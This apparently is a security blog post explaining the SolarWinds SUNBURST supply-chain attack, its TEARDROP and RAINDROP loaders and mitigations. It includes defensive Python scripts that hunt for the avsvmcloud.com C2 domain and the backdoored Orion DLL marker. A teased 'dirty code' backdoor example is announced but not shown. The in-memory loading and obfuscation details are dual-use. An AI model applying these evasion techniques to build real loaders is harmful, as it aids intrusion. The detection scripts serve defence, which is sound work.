SolarWinds Hack (CVE-2020-10148)
The SolarWinds hack, discovered in December 2020, was a large-scale supply chain attack in which the build of the Orion platform, SolarWinds' IT performance monitoring product, was trojanized so that a backdoor shipped to customers inside signed updates. The CVE in the title, CVE-2020-10148, is a related but separate flaw in the Orion API: an authentication bypass that let a remote attacker execute API commands on an Orion server. The SUNBURST supply chain compromise did not need that bug, so keep the two apart when reading the mitigation steps below.
What Happened?
The breach, attributed to a sophisticated group of cyber attackers believed to be state-sponsored, affected numerous government agencies and private sector companies. The attackers inserted malicious code into the Orion software updates, which, when installed by users, created a backdoor for further exploitation.
Exploit Process
Discovery and Announcement: The breach was uncovered by the cybersecurity firm FireEye, which found that its own systems had been compromised. Further investigation revealed that the source of the breach was the Orion software from SolarWinds.
Infection and Spread: The attackers gained access to SolarWinds' build environment and inserted the SUNBURST backdoor into the Orion component SolarWinds.Orion.Core.BusinessLayer.dll, so the malicious code was compiled, signed with SolarWinds' own certificate, and distributed through normal Orion updates. When customers installed an affected update, the backdoored DLL loaded inside the Orion service, stayed dormant for up to two weeks, and then began contacting its command-and-control infrastructure.
Remote Code Execution: Through this backdoor the attackers could run commands, transfer and execute files, profile the host, reboot it, and disable services. From there they moved laterally with stolen credentials, exfiltrated data, and deployed second-stage payloads such as TEARDROP and RAINDROP on the hosts they chose to pursue.
TEARDROP
What is it? TEARDROP is a second-stage loader used to deliver Cobalt Strike Beacon, a commercial adversary-simulation agent that real intruders frequently repurpose.
How does it work?
Deployment: Once SUNBURST established communication with the attackers, it could deploy TEARDROP onto the affected systems.
Functionality: TEARDROP executed the Cobalt Strike Beacon, which allowed the attackers to perform various tasks such as lateral movement, data exfiltration, and further exploitation of the network.
Detailed Functionality:
In-Memory Loading: TEARDROP was a memory-only dropper. It ran as a Windows service, read a payload stored behind a fake JPG header, decoded it, and loaded Cobalt Strike Beacon straight into memory. The Beacon itself was never written to disk, so file-based scanners had nothing to inspect.
Cobalt Strike Beacon: Once deployed, the Cobalt Strike Beacon can:
Command and Control (C2): Communicate with C2 servers for instructions.
Lateral Movement: Reach other hosts with credentials it has already collected, over standard Windows channels such as SMB, WMI and remote services, rather than by exploiting software bugs.
Privilege Escalation: Attempt to gain higher-level privileges on compromised systems.
Credential Dumping: Extract user credentials from memory.
Data Exfiltration: Collect and send sensitive data back to the attackers.
Persistence Mechanisms: Ensure long-term access by installing backdoors or altering system configurations.
Technical Details:
File Dropping: Delivered as a DLL and registered to run as a Windows service, blending in with the host's legitimate services.
Obfuscation Techniques: Per FireEye's analysis, the Beacon payload sits behind a fake JPG header, is decoded with a custom rolling XOR routine, and is mapped into memory from a custom PE-like format rather than a standard PE file, which defeats simple signature scanning of the dropped file.
RAINDROP
Detailed Functionality:
In-Memory Payload: Like TEARDROP, RAINDROP keeps the Cobalt Strike Beacon in memory only. The loader itself is not fileless: Symantec recovered it from disk as a DLL built from modified 7-Zip source code, so the file looks like a legitimate compression library.
Cobalt Strike Beacon Execution: Once deployed, it executes the Cobalt Strike Beacon, allowing the attackers to maintain control over the compromised systems.
Selective Deployment: Symantec found RAINDROP on only a handful of machines, and unlike TEARDROP it was not installed directly by SUNBURST; it turned up on hosts that had no SUNBURST at all, which points to its use for spreading across a victim network once the attackers already had a foothold.
Technical Details:
Loader Mechanism: The malicious export starts a thread, delays execution, locates the encoded payload hidden inside the 7-Zip code, and unpacks it in memory through XOR, AES and LZMA layers before running the Beacon.
Stealth Techniques: Hiding the payload inside a recognisable open-source code base, delaying execution, and never writing the Beacon to disk keep static scanners and short-running sandboxes from flagging the DLL.
Advanced Tactics and Techniques
Initial Access via SUNBURST: The attackers used the SUNBURST backdoor to establish an initial foothold. Because the code rode inside SolarWinds' own signed updates, it reached every customer that installed them, and the attackers then picked the victims worth pursuing.
C2 Communication: SUNBURST resolved subdomains of avsvmcloud.com whose leftmost label encoded the victim's internal domain, and its later HTTP traffic imitated the Orion Improvement Program protocol so that it looked like Orion's own telemetry. Beacon C2 ran on infrastructure set up per victim and located in the victim's own country, which limits the value of shared network indicators.
Network Reconnaissance: After deploying the Beacons, the attackers mapped the network, enumerated accounts and trusts, and identified the systems holding the data they were after before moving further.
Use of Legitimate Tools: The attackers favoured native Windows administration tooling and credentials they had stolen over custom malware, so most of their activity looked like routine administration and left few malware artifacts to detect.
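One concrete way to hunt for the first C2 stage in your own DNS logs, added here as an example and not code from the original post or from any of the cited reports: the script below scans a DNS query log for queries whose apex is the SUNBURST C2 domain avsvmcloud.com (from the FireEye report) and for leftmost labels that look machine-encoded the way SUNBURST's did. The log lines, the hostnames other than avsvmcloud.com, and the length and entropy thresholds are all constructed for the demo.

```python
"""Sweep a DNS query log for SUNBURST-style first-stage C2 resolution.

Added example for this page. Only the avsvmcloud.com apex and the
<label>.appsync-api.<region>.avsvmcloud.com shape come from the public
FireEye report; every log line and the other hostnames are constructed.
"""
import math
from collections import Counter

# Apex domain SUNBURST resolved for its first-stage C2 (FireEye, Dec 2020).
SUNBURST_C2_APEX = {"avsvmcloud.com"}

# Constructed sample log, one query per line: "<timestamp> <client_ip> <qtype> <qname>"
SAMPLE_DNS_LOG = """\
2020-12-01T10:15:02Z 10.20.30.40 A downloads.solarwinds.com
2020-12-01T10:15:09Z 10.20.30.40 A teams-messaging-cdn.example.net
2020-12-01T10:16:44Z 10.20.30.41 A k3h9pd2mq7v1zr8c4ytw.appsync-api.eu-west-1.avsvmcloud.com
2020-12-01T10:17:10Z 10.20.30.42 A w7n2xq9t4mc8r1zj5hpv.cdn.example.org
2020-12-01T10:18:00Z 10.20.30.43 AAAA mail.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random alphanumerics score well above English words."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def apex_of(qname: str) -> str:
    """Naive registrable domain (last two labels). Good enough for the demo;
    use a public-suffix list for ccTLDs such as .co.uk in production."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname.lower()


def looks_encoded(label: str, min_len: int = 16, min_entropy: float = 3.5) -> bool:
    """Heuristic for a SUNBURST-like leftmost label: long, lowercase ASCII
    alphanumerics with both letters and digits, and high entropy.
    Thresholds are assumptions for the demo; tune them against your own traffic."""
    if len(label) < min_len or not label.isascii() or not label.isalnum():
        return False
    if label != label.lower():
        return False
    if not (any(c.isdigit() for c in label) and any(c.isalpha() for c in label)):
        return False
    return shannon_entropy(label) >= min_entropy


def classify(qname: str):
    """Return (severity, reason); severity is None for benign-looking names."""
    apex = apex_of(qname)
    if apex in SUNBURST_C2_APEX:
        return "high", f"query to known SUNBURST C2 apex {apex}"
    first = qname.lower().split(".")[0]
    if looks_encoded(first):
        return "medium", f"encoded-looking leftmost label {first!r} (entropy {shannon_entropy(first):.2f})"
    return None, ""


def parse_line(line: str):
    parts = line.split()
    if len(parts) != 4:
        return None  # skip malformed or blank lines rather than crash the sweep
    ts, src, qtype, qname = parts
    return {"ts": ts, "src": src, "qtype": qtype, "qname": qname}


def scan_dns_log(text: str) -> list:
    """Return one finding per suspicious query, preserving log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        severity, reason = classify(rec["qname"])
        if severity:
            findings.append({**rec, "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"[{f['severity']}] {f['src']} -> {f['qname']}: {f['reason']}")
```

On the constructed log this reports the avsvmcloud.com query as high and the long random-looking label under example.org as medium. The apex match is the only conclusive signal; the entropy heuristic is a triage aid that will also catch CDN and cloud hostnames, so treat medium hits as a starting point for checking which process on the source host made the query.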
Code Example
Y'all wanna see some dirty code haha?
This class mimics a legitimate update process but includes a malicious payload that creates a backdoor user, exfiltrates data, and performs network reconnaissance.
What Systems Does It Affect?
The SolarWinds attack impacted approximately 18,000 customers who had installed the compromised Orion updates. This included a range of industries such as government agencies, healthcare providers, technology firms, and financial institutions.
What Does the Payload Do? The payload delivered through the SolarWinds hack allowed attackers to:
Gain persistent access to the compromised systems.
Move laterally within networks to access sensitive data.
Exfiltrate data and communications.
Install additional malware to further their goals.
Mitigation Steps
Isolate and Investigate:
Immediately isolate affected systems to prevent further spread.
Conduct a thorough investigation to identify the scope of the breach and affected systems.
Update and Patch:
Apply the hotfixes SolarWinds published for the Orion platform, which replace the trojanized component and close CVE-2020-10148. If there is any evidence that SUNBURST beaconed out from a host, patching alone is not enough: treat the host as compromised and rebuild it from a clean image, because the second-stage tooling persists independently of the Orion DLL.
Ensure all systems are running the latest, non-compromised versions of software.
Enhance Monitoring and Detection:
Increase monitoring of network traffic and system logs for signs of malicious activity.
Implement advanced threat detection tools to identify potential indicators of compromise.
Change Credentials and Access Controls:
Rotate every password, key and token the Orion server could reach: the Orion service account, its database credentials, the device and cloud credentials stored in Orion, and any certificates used to sign authentication tokens, since Beacon operators dump credentials from memory as a matter of course.
Review and tighten access controls to limit the risk of unauthorized access.
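A hunt that supports the "Isolate and Investigate" and "Update and Patch" steps is to find every copy of the Orion business-layer DLL in your environment and classify it. The script below is an added example for this page, not SolarWinds, FireEye or CISA code. The known-good and known-bad hash sets are placeholders computed from constructed demo files; in a real sweep they come from the vendor and from published IOC lists. The OrionImprovementBusinessLayer marker is the name of the backdoor class FireEye reported inside the trojanized DLL, which a clean build does not contain.

```python
"""Hunt for the trojanized Orion DLL across a file tree and classify each copy.

Added example for this page. Hash sets are placeholders built from the
constructed demo files in build_demo_tree(); replace them with vendor
hashes and published IOCs for a real sweep.
"""
import hashlib
import os
import tempfile
from pathlib import Path

TARGET_NAME = "solarwinds.orion.core.businesslayer.dll"  # matched case-insensitively
# Backdoor class name FireEye reported in the trojanized DLL (.NET type names are UTF-8 in metadata).
SUNBURST_MARKER = b"OrionImprovementBusinessLayer"

VERDICT_BAD_HASH = "known-bad hash"
VERDICT_MARKER = "SUNBURST backdoor class marker present"
VERDICT_CLEAN = "matches known-good hash"
VERDICT_UNKNOWN = "unknown build, verify against vendor hash"


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def assess(path: Path, known_bad: set, known_good: set) -> tuple:
    """Order matters: a bad-hash hit is conclusive, the marker catches
    recompiled variants the hash list misses, a good hash clears the file,
    anything else needs a manual check against the vendor's published hashes."""
    digest = sha256_of(path)
    if digest in known_bad:
        return VERDICT_BAD_HASH, digest
    if SUNBURST_MARKER in path.read_bytes():
        return VERDICT_MARKER, digest
    if digest in known_good:
        return VERDICT_CLEAN, digest
    return VERDICT_UNKNOWN, digest


def sweep(root, known_bad: set, known_good: set) -> list:
    """Walk root, classify every file named like the Orion DLL, return one finding per copy."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != TARGET_NAME:
                continue
            p = Path(dirpath) / name
            verdict, digest = assess(p, known_bad, known_good)
            findings.append({"path": str(p), "host": Path(dirpath).name,
                             "verdict": verdict, "sha256": digest})
    return findings


def build_demo_tree():
    """Constructed fixture: four 'hosts', each holding one copy of the DLL, plus a decoy file.
    The file contents are stand-ins, not real PE images."""
    root = Path(tempfile.mkdtemp(prefix="orion-sweep-"))
    clean = b"MZ clean orion build"
    trojan = b"MZ " + SUNBURST_MARKER + b" backdoored build"
    variant = b"MZ recompiled " + SUNBURST_MARKER   # marker present, hash not on any list
    unknown = b"MZ unlisted hotfix build"            # neither hash nor marker known
    copies = {
        "host-a": (clean, "SolarWinds.Orion.Core.BusinessLayer.dll"),
        "host-b": (trojan, "solarwinds.orion.core.businesslayer.dll"),
        "host-c": (variant, "SolarWinds.Orion.Core.BusinessLayer.dll"),
        "host-d": (unknown, "SolarWinds.Orion.Core.BusinessLayer.dll"),
    }
    for host, (content, fname) in copies.items():
        d = root / host
        d.mkdir()
        (d / fname).write_bytes(content)
    (root / "host-a" / "readme.txt").write_bytes(b"not a dll, must be ignored")
    known_good = {hashlib.sha256(clean).hexdigest()}
    known_bad = {hashlib.sha256(trojan).hexdigest()}
    return root, known_bad, known_good


if __name__ == "__main__":
    root, bad, good = build_demo_tree()
    for f in sorted(sweep(root, bad, good), key=lambda f: f["host"]):
        print(f"{f['host']}: {f['verdict']} ({f['sha256'][:12]}...)")
```

Point sweep() at the mounted file systems of your Orion servers (or at collected triage images) with real hash sets, and treat any "marker present" or "unknown build" result as a host to isolate until the file is confirmed against the vendor's hashes.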
Interview Questions
What is the most effective way to ensure the security of third-party software components in your organization's supply chain?
In the context of incident response, what types of activities best prepares an organization to handle sophisticated cyber attacks like the SolarWinds hack?
What key lesson from the SolarWinds hack can be applied to enhance an organization's cybersecurity strategy?
Cheers guys, hope y'all enjoyed this sharing!
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-10148
https://symantec-enterprise-blogs.security.com/threat-intelligence/solarwinds-raindrop-malware
https://cloud.google.com/blog/topics/threat-intelligence/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor/